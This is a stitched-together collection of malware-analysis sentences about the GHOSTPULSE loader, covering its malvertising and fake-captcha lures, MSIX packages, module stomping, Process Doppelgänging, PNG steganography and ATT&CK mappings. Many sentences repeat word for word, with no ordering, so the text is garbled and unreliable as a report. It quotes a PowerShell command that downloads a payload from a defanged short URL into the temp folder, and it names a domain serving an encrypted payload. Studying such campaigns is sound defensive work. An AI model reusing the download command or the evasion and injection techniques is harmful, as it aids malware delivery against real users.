GHOSTPULSE

Victims are typically lured through malicious advertising or SEO poisoning campaigns, believing they are downloading legitimate software such as Grammarly, Microsoft Teams, Notion, or Zoom.

Victims are typically lured through malicious advertising or SEO poisoning campaigns, believing they are downloading legitimate software such as Grammarly, Microsoft Teams, Notion, or Zoom.

In a common attack scenario, we suspect the users are directed to download malicious MSIX packages through compromised websites, search-engine optimization (SEO) techniques, or malvertising.

The infection chain begins with a phishing page that imitates a Cloudflare anti-DDoS Captcha verification.

The infection chain begins with a phishing page that imitates a Cloudflare anti-DDoS Captcha verification.

The malware then initiates a suspended child process using the executable specified in the Stage 2 configuration, which is a 32-bit cmd.exe in this case.

However, a PowerShell script is covertly used to download, decrypt, and execute GHOSTPULSE on the system.

When the malware necessitates the execution of an NT API, it adds the API offset to the base address of ntdll.dll and directly invokes the API.

This social engineering technique tricks users into copying and pasting malicious PowerShell that results in malware execution.

When executed, it fetches the following PowerShell script: Invoke-WebRequest -Uri "https://bitly[.]cx/iddD" -OutFile "$env:TEMP\ComponentStyle.zip"

Elastic Security Labs has observed a campaign to compromise users with signed MSIX application packages to gain initial access... With App Installer, MSIX packages can be installed with a double click.

To achieve this, the malware leverages COM (Component Object Model) objects as part of its technique.

The malware then initiates a suspended child process using the executable specified in the Stage 2 configuration, which is a 32-bit cmd.exe in this case.

GHOSTPULSE has the ability to establish persistence, if configured to, by generating an .lnk file that points to the Stage 1 binary, denoted as VBoxSVC.exe.

The legitimate mshtml.dll code is overwritten with the WriteProcessMemory API. The primary thread’s execution is then redirected to the malicious code in mshtml.dll with the Wow64SetThreadContext API.

The primary thread’s execution is then redirected to the malicious code in mshtml.dll with the Wow64SetThreadContext API.

Shellcode (Stage 2) contained inside the decrypted and decompressed blob of data is written to the .text section of the freshly loaded DLL and then executed. This technique is known as 'module stomping'.

GHOSTPULSE employs Process Doppelgänging, leveraging the NTFS transactions feature to inject the final payload into a new child process.

The malware then initiates a suspended child process using the executable specified in the Stage 2 configuration, which is a 32-bit cmd.exe in this case.

GHOSTPULSE has the ability to establish persistence, if configured to, by generating an .lnk file that points to the Stage 1 binary, denoted as VBoxSVC.exe.

The campaign leverages a stealthy loader we call GHOSTPULSE which decrypts and injects its final payload to evade detection... By minimizing the on-disk footprint of encrypted malicious code, the threat actor is able to evade file-based AV and ML scanning.

Defense Evasion Steganography T1027.003 Payload hidden in PNG IDAT chunk data stream

This is done to evade userland hooks set by security products.

Defense Evasion Masquerading T1036.005 Legitimate iMyFone binary with valid (expired) EV cert

The legitimate mshtml.dll code is overwritten with the WriteProcessMemory API. The primary thread’s execution is then redirected to the malicious code in mshtml.dll with the Wow64SetThreadContext API.

The primary thread’s execution is then redirected to the malicious code in mshtml.dll with the Wow64SetThreadContext API.

Shellcode (Stage 2) contained inside the decrypted and decompressed blob of data is written to the .text section of the freshly loaded DLL and then executed. This technique is known as 'module stomping'.

GHOSTPULSE employs Process Doppelgänging, leveraging the NTFS transactions feature to inject the final payload into a new child process.

During stage 1 of the loader, it decrypts the file using a DWORD addition operation with a value stored in the file itself.

Execution Windows Installer T1218.007 MSI deploys payload via msiexec

Defense Evasion Debugger Evasion T1622 IsDebuggerPresent checks in trojanized DLL

When the boolean field b_detect_process is set to True, the malware executes a function that checks for a list of processes to see if they are running.

Additionally, it has the capability to disable redirection of the file system to WOW64, achieved through the utilization of the procedure Wow64FsRedirection, if configured to do so.

Defense Evasion Debugger Evasion T1622 IsDebuggerPresent checks in trojanized DLL

In one sample, the PowerShell script downloads a GPG-encrypted file from manojsinghnegi[.]com/2.tar.gpg.

Command and Control Encrypted Channel T1573 HTTPS C2 communication